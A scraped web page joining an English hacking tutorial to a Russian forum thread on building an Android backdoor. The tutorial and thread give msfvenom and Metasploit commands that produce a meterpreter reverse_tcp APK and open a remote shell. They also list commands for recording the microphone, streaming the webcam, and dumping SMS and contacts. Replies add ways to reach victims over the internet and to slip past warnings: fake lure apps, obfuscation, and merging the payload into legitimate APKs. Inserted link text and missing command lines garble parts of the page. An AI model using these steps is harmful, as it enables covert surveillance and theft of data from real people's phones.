Metasploit kali linux android

Hacking Android With Metasploit

Good morning/evening/night my fellow hackers, today’s lesson is on Metasploit and how we can hack Android with a Metasploit payload. So let’s get started!!

As always, this post is for educational purposes and should not be used on your friends or enemies, that’s illegal.

Firstly we are using an Android emulator for this class. You can download the APK yourself from here and try this cool hack.

Once you have that set up, we then need an attacking machine with Metasploit built in, Kali Linux is our go-to attacking machine.

Next we will generate our android payload and make it into an APK so that it is executable, so open up a shell and on the command line type

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.139 LPORT=4444 R > androidhack.apk

In the command above we are asking the tool msfvenom to use the payload of reverse TCP, use our attacking IP as the LHOST and 4444 as the LPORT we will use to listen on.

Your IP may differ from ours, you can check with the ifconfig command.

Before we do anything with our new file, we will need to give it permissions to be able to execute, type

Once you enter that command the color of the file should turn green.

That’s the payload generated as an APK file that can be installed by any Android device. Next we will need to infect the device.

So let’s install the APK on the Android emulator.

To do that we just need to visit our attacking machine IP, so open a browser on the device and go to 192.168.1.139.

apk1

Let’s click on the file and install it on the device, once the app is installed you will be informed, but don’t open it just yet.

apk2

Now we need to generate an exploit on our attacking machine, we will do this with Metasploit. So open up a new tab or shell and type msfconsole.

apk3

Once the Metasploit console is open we can now generate the exploit. On the command line type

Читайте также:  Linux в виртуальной среде windows

apk4

Next we need to set the payload for a reverse TCP connection with the app on the Android device. Type

set PAYLOAD android/meterpreter/reverse_TCP

Perfect, now we set up our attacking machines IP as the LHOST again, sotype

A show options command will tell us that everything is set up correctly.

apk6

All that’s left to do nonw is exploit! type

Now let’s open the APK file on the Android device, when we click on the Open button we should get a reverse TCP shell from the Android device to our meterpreter shell.

apk7

Beauty, it worked!! Just to confirm we can type the command sysinfo.

apk8

And as we can see we have managed to hack the device.

Thanks so much for reading to the end, please feel free to like, share or comment.

And don’t forget to subscribe to get more free tutorials like this one.

Источник

Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload.

Установка и использование msfvenom payload:

1. Запустите kali и откройте панель управления.
2. Установите payload и создайте всплывающее окно пользователя вот этой командой:

[email protected]:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk

(Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig)

Файл apk сохранен в базовую папку.

Примечание: Нигде не добавляйте лишних символов и пробелов. Используйте команду в формате «как есть»( после изменения LHOST и LPORT как необходимо).

3. Передайте/ отправьте по e-mail этот файл (andro.apk) на телефон жертвы и запустите установку.
4. Запустите metasploit framework следующей командой

msf > use multi/handler msf exploit(handler) > set payload android/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.0.110 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > exploit Запускается драйвер Payload……..
  • record_mic
  • webcam_snap
  • webcam_stream
  • dump_contacts
  • dump_sms
  • geolocate
Error fixing(incase you get PARSE ERROR)
  1. Откройте папку «Signapk» и запустите расширение «cmd».
  2. Скопируйте «andro.apk» (созданное вами приложение) в папку Signapk.
  3. Введите следующую команду java -” jar signapk.jar certificate.pem key.pk8 andro.apk andro-signed.apk “в cmd (без двойных кавычек)
  4. Скопируйте на телефон и установите.
  5. Молимся чтобы сработало…
Читайте также:  Linux путь до флешки

The Codeby

Даниил Чистяков

Простите, но я делаю все согласно инструкции, но meterpeter не обращает внимания на мой смартфон, я запускаю программу и код, но ничего не происходит

Неизвестный

PoLMoRFi

Member

Все гуд. Работает) Вот интересно. А реально такое реализовать, не в «локалке», и что бы без предупреждений — что это вирус? Хотя-бы намекните)))

Sgtron Versio

Во первых IP 168.192.ХХ.ХХ должны быть в одной подсети. (инач несработает)
На ведройде должна стоять галочка установка приложений из неизвестных источников.
При передачи по емайлу скорее всего поругается сервис (гугл и майл) посчитает что хотите отправить вирус ))
.
приложение apk может рухнуть и сессия тю-тю. (нужно проверить не всегда срабатывает)

Sgtron Versio

Не во всех дистрибутивах будут права на запись в эту директорию=папку (если конечно глупо от root работать)
мне нужно явно указывать куда сохранять (где есть права на запись)
[email protected]:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk

centr

Все гуд. Работает) Вот интересно. А реально такое реализовать, не в «локалке», и что бы без предупреждений — что это вирус? Хотя-бы намекните)))

Работая с VPS коннект в не локальной сети разумеется реален( так же возможно указать свой внешний ip и тоже будет работать, если не сработает значить проброс порта.), с предупреждениями не много сложней.

ghostphisher

местный

Все гуд. Работает) Вот интересно. А реально такое реализовать, не в «локалке», и что бы без предупреждений — что это вирус? Хотя-бы намекните)))

Да назовите Deeppink — утилита по автораздеванию фото, там за секнуду поставят не обращая внимания на предупреждения Самое главное, когда нет возможности создать красивый apk нужно применять таргетированое СИ — смотреть на тренды в It, в потребности человека и предлогать ему подобное. СЛИВ АНБ, УТИЛИТА ДЛЯ СЛЕЖКИ, ОТ НАС ЭТО СКРЫВАЛИ! ФАЙЛ БУДЕТ ДОСТУПЕН 12 ЧАСОВ ПОТОМ УДАЛЮ ИНАЧЕ МЕНЯ ПОЙМАЮТ! и в том же духе, так и разводят во многих каналах ТГ где общаеют СЛИВЫ, ЧЕРНЫЙ ХАК, ДАРК ХАЙД, АНОНИМНЫЙ КАНАЛ — в 99% это тупо скрытая реклама своих курсов и впаривание файлов с полезной нагрузкой ( 80% скачивают «ПРИВАТНЫЙ» софт под linux — думаю что linux это так безопасно ), а так вместе с красивой программой подгружается в систему модуль , через который может быть как простейший майнинг так и ботнет.

Читайте также:  Ошибка busybox при запуске linux

PresetX

Все гуд. Работает) Вот интересно. А реально такое реализовать, не в «локалке», и что бы без предупреждений — что это вирус? Хотя-бы намекните)))

Не в локалке — нужен открытый порт на атакуемом/атакующем устройстве (tcp/reverse_tcp) или сервер, принимающий запросы.
Без предупреждений при установке — убрать некоторые permission, обфусцировать наверное (популярный софт же), или написать программу, получающую доступ к root, и через нее грузить приложение)

Krypton 8ch5

Все гуд. Работает) Вот интересно. А реально такое реализовать, не в «локалке», и что бы без предупреждений — что это вирус? Хотя-бы намекните)))

Не в локалке можно изменить значение lhost на твой глобальный ip в msfvenom а в настройке в metasploit указать локалку.

Данил Нткудин

New member

Вложения

skyFucker

New member

Данил Нткудин

New member

EnTerFoll

New member

Все гуд. Работает) Вот интересно. А реально такое реализовать, не в «локалке», и что бы без предупреждений — что это вирус? Хотя-бы намекните)))

Не в локалке можно изменить значение lhost на твой глобальный ip в msfvenom а в настройке в metasploit указать локалку.

Но при этом не стоит забывать про открытый порт, который нужно пробросить

У меня есть несколько вопросов. Первый — как сделать так, чтобы сессия не умирала(как я понимаю, mainactivity быстро очищается из оперативки) Второй: Я с помощью кода на питоне слил апк бэкдор с апк термукса(просто для примера), но при запуске приложения сессия не открывается. Я конечно не ручаюсь за правильность кода, но вроде он выводит третий апк, когда после декомпиляции сливает манифесты и остальные нужные файлы в один. В итоге получаем, что просто мейн активити палится и сессия подыхает за пару секунд(хотя на моём старом устройстве зачастую держалось до 10-ти минут), а при сливании с другим апк бэкдор даже не работает, устанавливая чистое приложение. Вот это и странно, по идее в манифесте бэкдора прописаны все разрешения, которые запрашиваются при установке, но при установке слитного апк они не выводятся, приложение остаётся чистым. Я ещё не супер знаток питона, мне пришлось этот код десять тысяч раз исправлять, когда я его нашёл в инете, и не факт, что я всё исправил

Источник

Оцените статью
Adblock
detector